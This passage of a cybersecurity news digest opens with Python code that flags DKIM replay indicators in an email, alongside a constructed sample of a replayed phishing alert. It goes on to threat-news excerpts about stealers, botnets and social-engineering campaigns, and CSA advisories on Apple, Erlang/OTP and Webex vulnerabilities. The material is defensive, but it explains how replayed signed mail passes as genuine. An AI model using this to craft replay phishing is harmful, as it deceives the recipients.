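        return ["no DKIM-Signature"]
    tags = parse_dkim_tags(str(sig))
    signed = {h.lower() for h in tags.get("h", "").split(":") if h}
    out: List[str] = []

    for must in ("to", "date", "message-id"):
        if must not in signed:
            out.append(f"{must} not covered by h= (can be rewritten without breaking the signature)")
    if "to" in signed:
        to_header = msg.get("To")
        to_addrs = {a.addr_spec.lower() for a in to_header.addresses} if to_header else set()
        if envelope_rcpt.lower() not in to_addrs:
            out.append(f"signed To {sorted(to_addrs)} does not include envelope recipient {envelope_rcpt}")
    if "l" in tags:
        out.append("l= body-length limit present: content appended after the signed bytes is not covered")
    if "x" not in tags:
        out.append("no x= expiry: the signature stays valid until the selector key is rotated")
    return out


# Constructed message: a genuine-looking alert signed by d=example.com and
# addressed to the mailbox the attacker controls; the attacker then forwards it
# unchanged to the victim. The bh= and b= values are placeholders, not real.
SAMPLE = b"""DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=example.com; s=sel1;
 h=from:to:subject:date:message-id; bh=PLACEHOLDERBODYHASH=; b=PLACEHOLDERSIG=
From: no-reply@example.com
To: attacker-mailbox@example.net
Subject: Security alert
Date: Tue, 22 Apr 2025 10:00:00 +0000
Message-ID: <alert-1@example.com>

A new sign-in was detected. Review the activity at https://sites.example.invalid/support
"""

if __name__ == "__main__":
    print("delivered to the victim:", replay_indicators(SAMPLE, "victim@example.org"))
    print("delivered to the original addressee:",
          replay_indicators(SAMPLE, "attacker-mailbox@example.net"))
```

The To: mismatch is the indicator worth acting on: a forwarded alert lands in a mailbox that the signed To: header never named, which is exactly what an authentic, un-replayed alert from the same sender never does. The other findings describe what a sender could tighten (sign Date and Message-ID, set x=, avoid l=) so that replays age out or break.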
https://www.bleepingcomputer.com/news/security/phishers-abuse-google-oauth-to-spoof-google-in-dkim-replay-attack/
https://threadreaderapp.com/thread/1912439023982834120.html
- New Rust Botnet "RustoBot" Is Routed Via Routers
"FortiGuard Labs recently discovered a new botnet propagating through TOTOLINK devices. Unlike previous malware targeting these devices, this variant is written in Rust—a programming language introduced by Mozilla in 2010. Due to its Rust-based implementation, we’ve named the malware “RustoBot.”"
https://www.fortinet.com/blog/threat-research/new-rust-botnet-rustobot-is-routed-via-routers
- Booking.com Phishing Scam Uses Fake CAPTCHA To Install AsyncRAT
"Fake Booking.com emails trick hotel staff into running AsyncRAT malware via fake CAPTCHA, targeting systems with remote access trojan. A new phishing campaign is targeting hotel staff with fake Booking.com emails, tricking victims into executing malicious commands on their own systems. The scam appears well-planned, combining social engineering with the end aim to infect and compromise hotel networks with AsyncRAT."
https://hackread.com/booking-com-phishing-scam-fake-captcha-asyncrat/
- Lumma Stealer – Tracking Distribution Channels
"The evolution of Malware-as-a-Service (MaaS) has significantly lowered the barriers to entry for cybercriminals, with information stealers becoming one of the most commercially successful categories in this underground economy. Among these threats, Lumma Stealer has emerged as a particularly sophisticated player since its introduction in 2022 by the threat actor known as Lumma. Initially marketed as LummaC2, this information stealer quickly gained traction in underground forums, with prices starting at $250. As of March 2025, its presence on dark web marketplaces and Telegram channels continues to grow, with over a thousand active subscribers."
https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/
- Mitigating ELUSIVE COMET Zoom Remote Control Attacks
"When our CEO received an invitation to appear on “Bloomberg Crypto,” he immediately recognized the hallmarks of a sophisticated social engineering campaign. What appeared to be a legitimate media opportunity was, in fact, the latest operation by ELUSIVE COMET—a threat actor responsible for millions in cryptocurrency theft through carefully constructed social engineering attacks. This post details our encounter with ELUSIVE COMET, explains their attack methodology targeting the Zoom remote control feature, and provides concrete defensive measures organizations can implement to protect themselves."
https://blog.trailofbits.com/2025/04/17/mitigating-elusive-comet-zoom-remote-control-attacks/
https://www.securityweek.com/north-korean-cryptocurrency-thieves-caught-hijacking-zoom-remote-control-feature/
- Japan Warns Of Hundreds Of Millions Of Dollars In Unauthorized Trades From Hacked Accounts
"Japanese regulators published an urgent warning about hundreds of millions of dollars worth of unauthorized trades being conducted on hacked brokerage accounts in the country. Japan’s Financial Services Agency (FSA) said on Friday that there has been a “sharp increase in the number of cases of unauthorized access and unauthorized trading” through online trading services. The trend was occurring, according to the agency, because of stolen customer information obtained through phishing websites “disguised as websites of real securities companies.”"
https://therecord.media/japan-warns-of-unauthorized-trades-hacked-accounts
- AgeoStealer: How Social Engineering Targets Gamers
"Infostealers have proven to be a gold mine for threat actors, responsible for stealing 75%—or 2.1 billion—of 2024’s 3.2 billion total credentials, fueling a constant cycle of account takeover attacks, ransomware, and high-profile data breaches. In our 2025 Global Threat Intelligence Report, we detailed their meteoric rise as a primary threat vector, with our analysts tracking over 24 unique stealer strains—such as RedLine, RisePro, and Lumma Stealer—being listed for sale on illicit marketplaces. Now, organizations will need to add AgeoStealer to their watch list as cybercriminals exploit the immense popularity of gaming."
https://flashpoint.io/blog/ageostealer-how-social-engineering-targets-gamers/
- False Face: Unit 42 Demonstrates The Alarming Ease Of Synthetic Identity Creation
"Evidence suggests that North Korean IT workers are using real-time deepfake technology to infiltrate organizations through remote work positions, which poses significant security, legal and compliance risks. The detection strategies we outline in this report provide security and HR teams with practical guidance to strengthen their hiring processes against this threat."
https://unit42.paloaltonetworks.com/north-korean-synthetic-identity-creation/
- Pirate Ships As a Service: Scallywag And Enabling Digital Piracy
"It’s hard to monetize digital piracy. Advertisers don’t want their brands associated with illicit activity, after all. As a result, threat actors have to get crafty with finding revenue sources to cash out and make the risks of sailing the high seas worth it for them. HUMAN’s Satori Threat Intelligence and Research team has disrupted Scallywag, a sophisticated ad fraud operation using a collection of WordPress extensions to monetize digital piracy with hundreds of cashout domains and URL shortening. Scallywag generates revenue for bad actors by inserting intermediary pages between a piracy catalog site and the actual streaming pirated content."
https://www.humansecurity.com/scallywag-open-redirectors/
https://www.humansecurity.com/learn/blog/satori-disruption-scallywag/
https://www.bleepingcomputer.com/news/security/scallywag-ad-fraud-operation-generated-14-billion-ad-requests-per-day/
- KeyPlug-Linked Server Briefly Exposes Fortinet Exploits, Webshells, And Recon Activity Targeting a Major Japanese Company
"A briefly exposed directory on infrastructure tied to KeyPlug malware revealed tooling likely used in active operations. The server, live for less than a day, exposed Fortinet firewall and VPN-targeting exploit scripts, a PHP-based webshell, and network reconnaissance scripts targeting authentication and internal portals associated with a major Japanese company. While short-lived, the exposure provides an unfettered view into a likely advanced adversary's operational staging and planning."
https://hunt.io/blog/keyplug-server-exposes-fortinet-exploits-webshells
Breaches/Hacks/Leaks
- Texas City Takes Systems Offline After Cyberattack
"The government of Abilene, Texas, has shut down some of its systems due to a cyberattack. City officials said they became aware of the incident on Friday when they received reports of unresponsive servers within the city’s internal network. IT staff immediately began disconnecting the affected systems and cybersecurity experts have been hired to investigate the issue. “Out of an abundance of caution, certain systems have been taken offline. However, emergency services are still up and running with the continued ability to timely assist, and no unidentified financial activity has been detected,” the city said on Monday."
https://therecord.media/texas-abilene-offline-cyberattack-systems
General News
- Cybercriminals Blend AI And Social Engineering To Bypass Detection
"Attackers are focusing more on stealing identities. Because of this, companies need to use zero trust principles. They should also verify user identities more carefully, says DirectDefense. Researchers analyzed thousands of alerts, mapping them to the MITRE ATT&CK framework, a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations."
https://www.helpnetsecurity.com/2025/04/21/adversaries-cybercrime-techniques/
- Cyber Threats Now a Daily Reality For One In Three Businesses
"Businesses are losing out on an average of $98.5 million a year as a consequence of cyber threats, fraud, regulatory hurdles and operational inefficiencies, according to research from FIS and Oxford Economics. The cost of disharmony is highest among technology companies, followed by insurance, financial services and fintech respondents."
https://www.helpnetsecurity.com/2025/04/21/businesses-fraud-consequence/
- Why CISOs Are Watching The GenAI Supply Chain Shift Closely
"In supply chain operations, GenAI is gaining traction. But according to Logility’s Supply Chain Horizons 2025 report, many security leaders remain uneasy about what that means for data protection, legacy tech, and trust in automation. The survey of 500 global supply chain leaders shows that 97% are already using some form of GenAI. But only a third are using tools designed specifically for supply chain tasks. And nearly half (43%) say they worry about how their data is used or shared when applying GenAI. Another 40% don’t trust the answers it gives."
https://www.helpnetsecurity.com/2025/04/21/ciso-genai-supply-chain/
- Microsoft Dominates As Top Target For Imitation, Mastercard Makes a Comeback
"Phishing attacks are one of the primary intrusion points for cyber criminals. As we examine the phishing threat landscape through the first quarter of 2025, cyber criminals continue to leverage trusted names to deceive unsuspecting users. Here’s a closer look at the trends, top brands targeted, and most notable incidents we’ve observed thus far in 2025."
https://blog.checkpoint.com/research/microsoft-dominates-as-top-target-for-imitation-mastercard-makes-a-comeback/
- Thinking Of Smishing Your Employees? Think Twice.
"With the pervasiveness of SMS-based phishing, often referred to as “smishing,” to target consumers’ personal devices, more organizations are considering deploying smishing simulations on employees’ mobile phones. These efforts stem from concerns over potential corporate breaches and compliance requirements. However, this approach is fraught with its own risks and can open organizations to legal liability and regulatory fines – not to mention the damage it can do to employee morale."
https://cofense.com/blog/thinking-of-smishing-your-employees-think-twice
- The Sophos Annual Threat Report: Cybercrime On Main Street 2025
"Small businesses are a prime target for cybercrime, as we highlighted in our last annual report. Many of the criminal threats we covered in that report remained a major menace in 2024, including ransomware–which remains a primary existential cyber threat to small and midsized organizations. Ransomware cases accounted for 70 percent of Sophos Incident Response cases for small business customers in 2024—and over 90 percent for midsized organizations (from 500 to 5000 employees). Ransomware and data theft attempts accounted for nearly 30 percent of all Sophos Managed Detection and Response (MDR) tracked incidents (in which malicious activity of any sort was detected) for small and midsized businesses."
https://news.sophos.com/en-us/2025/04/16/the-sophos-annual-threat-report-cybercrime-on-main-street-2025/
https://www.darkreading.com/threat-intelligence/nation-state-threats-smb
- Can Cybersecurity Weather The Current Economic Chaos?
"As the Trump administration continues to pursue a chaotic tariff policy — announcing steep tariffs on the United States' major trading partners, only to pause most of the import taxes for 90 days — economists are increasingly predicting a recession in the next 12 months, as business decision-makers pare back plans for the future amid increasing inflation and uncertainty."
https://www.darkreading.com/cloud-security/cybersecurity-weather-current-economic-chaos
- The Global AI Race: Balancing Innovation And Security
"We are, without question, in a global AI race. Every organization, supplier, and government is rushing to realize AI's benefits before their competitors do. The stakes are massive — not just in terms of business competition but in shaping the future balance of power across industries and nations. This validates AI's power and usefulness — it's considered existential to "get there first," as those who successfully leverage AI (especially artificial general intelligence and superintelligence) expect to become uncatchable."
https://www.darkreading.com/vulnerabilities-threats/global-ai-race-balancing-innovation-security
- Countries Shore Up Their Digital Defenses As Global Tensions Raise The Threat Of Cyberwarfare
"Hackers linked to Russia’s government launched a cyberattack last spring against municipal water plants in rural Texas. At one plant in Muleshoe, population 5,000, water began to overflow. Officials had to unplug the system and run the plant manually. The hackers weren’t trying to taint the water supply. They didn’t ask for a ransom. Authorities determined the intrusion was designed to test the vulnerabilities of America’s public infrastructure. It was also a warning: In the 21st century, it takes more than oceans and an army to keep the United States safe."
https://www.securityweek.com/countries-shore-up-their-digital-defenses-as-global-tensions-raise-the-threat-of-cyberwarfare/
- Cyberfraud In The Mekong Reaches Inflection Point, UNODC Reveals
"Transnational organized crime groups in East and Southeast Asia are hedging beyond the region as crack-down pressure increases, a new report by the UN Office on Drugs and Crime (UNODC) shows. Amidst heightened awareness and enforcement action, Asian crime syndicates are expanding operations deeper into many of the most remote, vulnerable, underprepared parts of the region — and beyond."
https://www.unodc.org/roseap/en/2025/04/cyberfraud-mekong-inflection-point/story.html
https://therecord.media/southeast-asia-cyber-fraud-at-inflection-point
Reference
Electronic Transactions Development Agency (ETDA)
- Hawk Eye: Open-Source Scanner Uncovers Secrets And PII Across Platforms
-
Exploitation of vulnerabilities in Apple products
The Cyber Security Agency of Singapore (CSA) has published an alert that Apple has released security updates to fix multiple vulnerabilities in its products, and advises users and administrators of affected products to update to the latest version immediately. The patched vulnerabilities (CVE-2025-31200 and CVE-2025-31201) are reported to be actively exploited in the wild.
Details of the vulnerabilities are as follows:
CVE-2025-31200: A memory corruption vulnerability. Successful exploitation could allow an attacker to execute code when a media file containing a maliciously crafted audio stream is processed.
CVE-2025-31201: Successful exploitation could allow an attacker with arbitrary read and write capability to bypass Pointer Authentication.
Affected products are as follows:
- iPhone XS and later
- iPad Pro 13-inch
- iPad Pro 13.9-inch (3rd generation and later)
- iPad Pro 11-inch (1st generation and later)
- iPad Air (3rd generation and later)
- iPad (7th generation and later)
- iPad mini (5th generation and later)
- Macs running macOS Sequoia
- Apple TV HD and all Apple TV 4K models
- Apple Vision Pro
Users and administrators are advised to update to the latest version immediately to mitigate the risk of exploitation.
In addition, users should enable automatic updates by going to:
Settings > General > Software Updates > Enable Automatic Updates
Reference
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-038
-
Critical vulnerability in the Erlang/OTP SSH server
The Cyber Security Agency of Singapore (CSA) has published an alert that security researchers have disclosed a critical-severity vulnerability in the Erlang/OTP SSH server, and advises users and administrators of affected versions to update to the latest version immediately.
The vulnerability (CVE-2025-32433) affects the SSH server in Erlang/OTP, a set of libraries for the Erlang programming language. It has a CVSSv3.1 score of 10, and proof-of-concept exploit code has already been published. Successful exploitation by a malicious actor could allow authentication bypass and remote code execution.
This vulnerability affects the following Erlang/OTP versions and all earlier versions:
- OTP-27.3.2
- OTP-26.2.5.10
- OTP-25.3.2.19
Users and administrators are advised to update the software to the latest version immediately to mitigate the risk of exploitation.
Reference
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-036/
-
Critical vulnerability in the Cisco Webex app
The Cyber Security Agency of Singapore (CSA) has published an alert that Cisco has released security updates to fix a vulnerability in the Cisco Webex application, and advises users and administrators of affected products to update to the latest version immediately.
The patched vulnerability (CVE-2025-20236) affects Cisco Webex App versions 44.6 and 44.7. A malicious actor who successfully exploits this vulnerability could lure a victim into clicking a maliciously crafted meeting invite link to download arbitrary files, leading to remote code execution on the victim's device.
Users and administrators are therefore advised to update the software to the latest version immediately to mitigate the risk of exploitation.
Reference
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-037/